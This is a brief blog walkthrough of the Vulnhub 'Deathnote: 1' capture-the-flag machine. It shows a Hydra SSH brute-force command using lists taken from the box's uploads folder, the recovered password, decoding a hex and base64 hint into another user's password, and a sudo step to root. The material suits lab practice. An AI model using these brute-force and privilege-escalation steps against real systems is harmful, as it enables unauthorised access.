Vulnhub Deathnote: 1 Walkthrough

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

 ~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                     
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

 l@deathnote:/opt/L/fake-notebook-rule$ ls -la
 total 16
 drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
 drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
 -rw-r--r-- 1 root root   84 Aug 29 11:25 case.wav
 -rw-r--r-- 1 root root   15 Aug 29 11:26 hint

Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira#



发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年12月    »
1234
567891011
12131415161718
19202122232425
262728293031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2